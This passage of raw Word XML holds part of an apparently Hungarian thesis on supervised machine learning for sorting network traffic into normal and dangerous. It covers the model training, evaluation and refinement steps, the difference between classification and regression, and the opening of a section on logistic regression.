      <w:r w:rsidR="00DD3E4B" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Itt felhasználjuk az adatkészle</w:t>
      </w:r>
      <w:r w:rsidR="00D37A48" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00DD3E4B" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> tanítás</w:t>
      </w:r>
      <w:r w:rsidR="00964149" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidR="00DD3E4B" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">hoz elkülönített részét, hogy megtanítsuk </w:t>
      </w:r>
      <w:r w:rsidR="008C7AF7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>algoritmusunk</w:t>
      </w:r>
      <w:r w:rsidR="00DD3E4B" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="003814B4" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>két</w:t>
      </w:r>
      <w:r w:rsidR="00DD3E4B" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003814B4" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>állapot (</w:t>
      </w:r>
      <w:r w:rsidR="00A73F27">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>normál adatforgalom</w:t>
      </w:r>
      <w:r w:rsidR="003814B4" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A73F27">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>veszélyes adatforgalom</w:t>
      </w:r>
      <w:r w:rsidR="003814B4" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00DD3E4B" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> megkülönböztetésére.</w:t>
      </w:r>
      <w:r w:rsidR="00103F5D" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC394E" w:rsidRPr="00FC7DFF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Az így kapott betanított, pontos algoritmus a gépi tanulási modell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A2F7D" w14:textId="77777777" w:rsidR="00895002" w:rsidRDefault="007E3357" w:rsidP="00C116AD">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Modell é</w:t>
      </w:r>
      <w:r w:rsidR="005F254F" w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>rtékelés</w:t>
      </w:r>
      <w:r w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBF5C2" w14:textId="11D9BFCC" w:rsidR="00D21F5F" w:rsidRPr="00872167" w:rsidRDefault="00900A34" w:rsidP="00895002">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ebben a lépésben a</w:t>
      </w:r>
      <w:r w:rsidR="00FC2B6C" w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z adatkészlet teszteléséhez </w:t>
      </w:r>
      <w:r w:rsidR="00AD1069" w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>elkülönített részét használjuk fel</w:t>
      </w:r>
      <w:r w:rsidR="00361790">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BE5BD6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahogy korábban említettem, </w:t>
      </w:r>
      <w:r w:rsidR="00FC64FC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ekkor </w:t>
      </w:r>
      <w:r w:rsidR="00BE5BD6" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>az algoritmus önállóan címkézi fel</w:t>
      </w:r>
      <w:r w:rsidR="006101F2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az adatokat</w:t>
      </w:r>
      <w:r w:rsidR="00BE5BD6" w:rsidRPr="004E46EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, ezzel tesztelve, hogy a megállapítása jó-e vagy rossz</w:t>
      </w:r>
      <w:r w:rsidR="00D802FA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, ezzel értékelést adva magáról a modellről.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30180302" w14:textId="77777777" w:rsidR="00895002" w:rsidRDefault="00A03D5C" w:rsidP="00C116AD">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Modell fejlesztése</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A6819" w14:textId="0205E4F0" w:rsidR="00D21F5F" w:rsidRPr="00872167" w:rsidRDefault="000900F3" w:rsidP="00895002">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A hatodik lépés megpróbálja javítani az értékelési lépés során elért eredményeket</w:t>
      </w:r>
      <w:r w:rsidR="00E720DB" w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D0230D" w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B260E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ha az eredménye</w:t>
      </w:r>
      <w:r w:rsidR="004D695B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="007B260E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> szinten aluli, akkor az eddigi lépések ellenőrzés</w:t>
      </w:r>
      <w:r w:rsidR="00E70317">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ére</w:t>
      </w:r>
      <w:r w:rsidR="007B260E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, javítás</w:t>
      </w:r>
      <w:r w:rsidR="00E70317">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ára</w:t>
      </w:r>
      <w:r w:rsidR="007B260E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> vagy módosítására kerül sor addig, amíg a tesztelés kimenete</w:t>
      </w:r>
      <w:r w:rsidR="000F66EB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> nem lesz</w:t>
      </w:r>
      <w:r w:rsidR="007B260E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> elégséges vagy megfelelő.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E62CF09" w14:textId="77777777" w:rsidR="00895002" w:rsidRDefault="00A03D5C" w:rsidP="00C116AD">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Modell használata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624C517F" w14:textId="20225212" w:rsidR="00D42B45" w:rsidRDefault="007F7064" w:rsidP="00895002">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Az utolsó lépés a modell új adatokkal történő felhasználása</w:t>
      </w:r>
      <w:r w:rsidR="009107CF" w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006831F4" w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D441B6" w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A modell ekkor függetlenséget nyer az emberi beavatkozás</w:t>
      </w:r>
      <w:r w:rsidR="00F0745D" w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ai</w:t>
      </w:r>
      <w:r w:rsidR="00D441B6" w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tól és saját adatállománya</w:t>
      </w:r>
      <w:r w:rsidR="00E760E3" w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, valamint </w:t>
      </w:r>
      <w:r w:rsidR="00D441B6" w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>képzése alapján vonja le saját következtetés</w:t>
      </w:r>
      <w:r w:rsidR="007E1DF9" w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>eit.</w:t>
      </w:r>
      <w:r w:rsidR="003C7177" w:rsidRPr="00D21F5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00074BEB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Szoftverfejlesztési megközelítésből ez az a lépés</w:t>
      </w:r>
      <w:r w:rsidR="005B23AB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az</w:t>
      </w:r>
      <w:r w:rsidR="00074BEB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, amit a végfelhasználó lát.</w:t>
      </w:r>
      <w:r w:rsidR="00774468">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00794AC0" w:rsidRPr="00794AC0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ez a lépés rávilágít arra, miért tartják sokan a gépi tanulást a különböző iparágak jövőjének</w:t>
      </w:r>
      <w:r w:rsidR="00794AC0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C74946" w14:textId="13ABD957" w:rsidR="00A75006" w:rsidRPr="003B000E" w:rsidRDefault="00D42B45" w:rsidP="003840F2">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42B45">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az emberek csak bizonyos mennyiségű adatot és releváns tényezőt </w:t>
      </w:r>
      <w:r w:rsidR="009404DE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tarthatnak szem előtt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42B45">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a döntés meghozatalakor.</w:t>
      </w:r>
      <w:r w:rsidR="00B95A17">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ezzel szemben a</w:t>
      </w:r>
      <w:r w:rsidR="00743E29" w:rsidRPr="00743E29">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> gépi tanulási modellek nagy mennyiségű adatot képesek feldolgozni és összekapcsolni</w:t>
      </w:r>
      <w:r w:rsidR="00884D3B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, ezzel betekintést nyerve </w:t>
      </w:r>
      <w:r w:rsidR="00DD4ADA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>abba, amit normális megközelítéssel látni nem lehet.</w:t>
      </w:r>
      <w:r w:rsidR="00E64B44">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00764842">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Többek közö</w:t>
      </w:r>
      <w:r w:rsidR="0061458B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tt</w:t>
      </w:r>
      <w:r w:rsidR="00C83F35">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B7922">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">kétségbevonhatatlan </w:t>
      </w:r>
      <w:r w:rsidR="00C83F35">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>fontosságának</w:t>
      </w:r>
      <w:r w:rsidR="001B7922">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> okán alakult ki több kategória gépi tanuláson belül </w:t>
      </w:r>
      <w:r w:rsidR="009A4ADB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a felügyelt gépi tanulás</w:t>
      </w:r>
      <w:r w:rsidR="00C979B4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> körében</w:t>
      </w:r>
      <w:r w:rsidR="003840F2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>: az</w:t>
      </w:r>
      <w:r w:rsidR="00A75006" w:rsidRPr="00A75006">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> osztályozás (classification) és</w:t>
      </w:r>
      <w:r w:rsidR="00F4402C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00A75006" w:rsidRPr="00A75006">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> regresszió (regression). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
      </w:r>
      <w:r w:rsidR="00A75006" w:rsidRPr="00A75006">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">válaszol, a regresszió pedig a „Milyen idő lesz holnap?”. A program kérdésköre az osztályozáshoz tartozik, így </w:t>
      </w:r>
      <w:r w:rsidR="003B000E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>annak algoritmusait veszem sorra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6DB4B" w14:textId="7B2CF763" w:rsidR="00B726C6" w:rsidRDefault="00B726C6" w:rsidP="00854DD3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071B955E" w14:textId="19D52461" w:rsidR="00664B45" w:rsidRPr="00CA1092" w:rsidRDefault="00F4275F" w:rsidP="00854DD3">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc71471970"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Osztályozás</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="50993033" w14:textId="431C454A" w:rsidR="00B726C6" w:rsidRDefault="00B726C6" w:rsidP="00461D93">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9AFFED" w14:textId="0E58213A" w:rsidR="009C0C84" w:rsidRDefault="006D70FD" w:rsidP="006D70FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D70FD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="001D0775">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z osztályozás </w:t>
      </w:r>
      <w:r w:rsidR="003104A2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tanuló adat</w:t>
      </w:r>
      <w:r w:rsidR="004E13DC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidR="00C76DF7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C76DF7" w:rsidRPr="006D70FD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>alapján</w:t>
      </w:r>
      <w:r w:rsidR="004E13DC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – továbbiakban független változók</w:t>
      </w:r>
      <w:r w:rsidR="00393EE9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (independent variables)</w:t>
      </w:r>
      <w:r w:rsidR="004E13DC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="003104A2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D70FD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">annak meghatározása, hogy melyik osztályba tartozik </w:t>
      </w:r>
      <w:r w:rsidR="00980E66">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a bemenetként megadott </w:t>
      </w:r>
      <w:r w:rsidR="008F30B0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nem tanuló adat</w:t>
      </w:r>
      <w:r w:rsidR="00CB71FD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – továbbiakban függő változó</w:t>
      </w:r>
      <w:r w:rsidR="00393EE9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dependent variable)</w:t>
      </w:r>
      <w:r w:rsidR="008F30B0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA188BB" w14:textId="77777777" w:rsidR="00CB6F4D" w:rsidRDefault="00CB6F4D" w:rsidP="00461D93">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470778C8" w14:textId="24FEC51D" w:rsidR="00D33DD0" w:rsidRPr="00EE621D" w:rsidRDefault="00D33DD0" w:rsidP="00EE621D">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5" w:name="_Toc71471971"/>
      <w:r w:rsidRPr="00EE621D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Logistic Regression</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="7FC29EE7" w14:textId="685704B8" w:rsidR="00CB6F4D" w:rsidRDefault="00CB6F4D" w:rsidP="00461D93">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B1FD8A" w14:textId="7BB0EF15" w:rsidR="004A338D" w:rsidRDefault="003C69DF" w:rsidP="00560C93">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C69DF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00C41104">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:r w:rsidRPr="003C69DF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>osztályozási algoritmus</w:t>
      </w:r>
      <w:r w:rsidR="00C41104">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidR="00F7657A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> célja</w:t>
      </w:r>
      <w:r w:rsidR="001B643D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F7657A" w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hogy</w:t>
      </w:r>
      <w:r w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E7C8C" w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a függő változót </w:t>
      </w:r>
      <w:r w:rsidR="00D278A0" w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">egy </w:t>
      </w:r>
      <w:r w:rsidR="00DA095D" w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>osztályba</w:t>
      </w:r>
      <w:r w:rsidR="00222822" w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> sorolj</w:t>
      </w:r>
      <w:r w:rsidR="007E4814" w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ák</w:t>
      </w:r>
      <w:r w:rsidR="009E481A" w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>független változók halmaz</w:t>
      </w:r>
      <w:r w:rsidR="00BE032B" w:rsidRPr="001B78F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>át felhasználva</w:t>
      </w:r>
      <w:r w:rsidR="001178BC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001B3143">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC3EED" w:rsidRPr="00FC3EED">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00315115">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Logistic Regression</w:t>
      </w:r>
      <w:r w:rsidR="00A3060C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C561BD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ennek egy speciális esete</w:t>
      </w:r>
      <w:r w:rsidR="00A3060C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
